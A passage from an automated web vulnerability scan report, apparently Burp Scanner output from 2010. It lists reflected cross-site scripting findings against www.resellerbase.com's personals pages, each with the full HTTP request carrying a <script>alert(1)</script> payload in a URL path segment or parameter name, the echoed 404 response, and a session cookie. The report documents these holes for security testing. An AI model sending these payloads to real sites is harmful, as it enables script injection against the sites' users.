Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images7edfb<script>alert(1)</script>d0a8f0849d1/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.231. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/0.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 4d3d7<script>alert(1)</script>874785db1a7 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/rating4d3d7<script>alert(1)</script>874785db1a7/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/rating4d3d7<script>alert(1)</script>874785db1a7/0.gif was not found on this server.</p>
...[SNIP]...

2.232. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/0.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload bbbb6<script>alert(1)</script>4aa9ad9e3d3 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/rating/0.gifbbbb6<script>alert(1)</script>4aa9ad9e3d3 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/rating/0.gifbbbb6<script>alert(1)</script>4aa9ad9e3d3 was not found on this server.</p>
...[SNIP]...

2.233. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c06f8<script>alert(1)</script>9b4a371687 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/rating/0.gif?c06f8<script>alert(1)</script>9b4a371687=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/rating/0.gif?c06f8<script>alert(1)</script>9b4a371687=1 was not found on this server.</p>
...[SNIP]...

2.234. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/4half.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f8193<script>alert(1)</script>84b455883c6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adultf8193<script>alert(1)</script>84b455883c6/personals-dating/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adultf8193<script>alert(1)</script>84b455883c6/personals-dating/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.235. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/4half.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1c64a<script>alert(1)</script>71965dd310c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating1c64a<script>alert(1)</script>71965dd310c/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating1c64a<script>alert(1)</script>71965dd310c/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.236. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/4half.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6c37c<script>alert(1)</script>04332e9b7bd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes6c37c<script>alert(1)</script>04332e9b7bd/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes6c37c<script>alert(1)</script>04332e9b7bd/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.237. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/4half.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6bda4<script>alert(1)</script>3463ebfc882 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos6bda4<script>alert(1)</script>3463ebfc882/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos6bda4<script>alert(1)</script>3463ebfc882/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.238. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/4half.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload d25eb<script>alert(1)</script>f186917ffcb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/imagesd25eb<script>alert(1)</script>f186917ffcb/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/imagesd25eb<script>alert(1)</script>f186917ffcb/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.239. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/4half.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f76f2<script>alert(1)</script>14d4506a915 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/ratingf76f2<script>alert(1)</script>14d4506a915/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/ratingf76f2<script>alert(1)</script>14d4506a915/4half.gif was not found on this server.</p>
...[SNIP]...

2.240. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/4half.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 91d29<script>alert(1)</script>78187251882 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/rating/4half.gif91d29<script>alert(1)</script>78187251882 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/rating/4half.gif91d29<script>alert(1)</script>78187251882 was not found on this server.</p>
...[SNIP]...

2.241. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/4half.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/rating/4half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a1b73<script>alert(1)</script>5a3af24b186 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/rating/4half.gif?a1b73<script>alert(1)</script>5a3af24b186=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/rating/4half.gif?a1b73<script>alert(1)</script>5a3af24b186=1 was not found on this server.</p>
...[SNIP]...

2.242. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 57f48<script>alert(1)</script>634782d18e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult57f48<script>alert(1)</script>634782d18e6/personals-dating/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult57f48<script>alert(1)</script>634782d18e6/personals-dating/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.243. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 27596<script>alert(1)</script>edfb4df41fb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating27596<script>alert(1)</script>edfb4df41fb/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating27596<script>alert(1)</script>edfb4df41fb/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.244. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload eb0ac<script>alert(1)</script>97ca728ddbe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themeseb0ac<script>alert(1)</script>97ca728ddbe/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themeseb0ac<script>alert(1)</script>97ca728ddbe/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.245. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8af4c<script>alert(1)</script>68964381781 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos8af4c<script>alert(1)</script>68964381781/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos8af4c<script>alert(1)</script>68964381781/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.246. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 7ed98<script>alert(1)</script>b768a2b51c7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images7ed98<script>alert(1)</script>b768a2b51c7/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images7ed98<script>alert(1)</script>b768a2b51c7/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.247. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 8bdc9<script>alert(1)</script>23cdfb53eea was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/rating8bdc9<script>alert(1)</script>23cdfb53eea/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/rating8bdc9<script>alert(1)</script>23cdfb53eea/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.248. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload a5792<script>alert(1)</script>529f76e6fc1 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/rating/search.phpa5792<script>alert(1)</script>529f76e6fc1?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

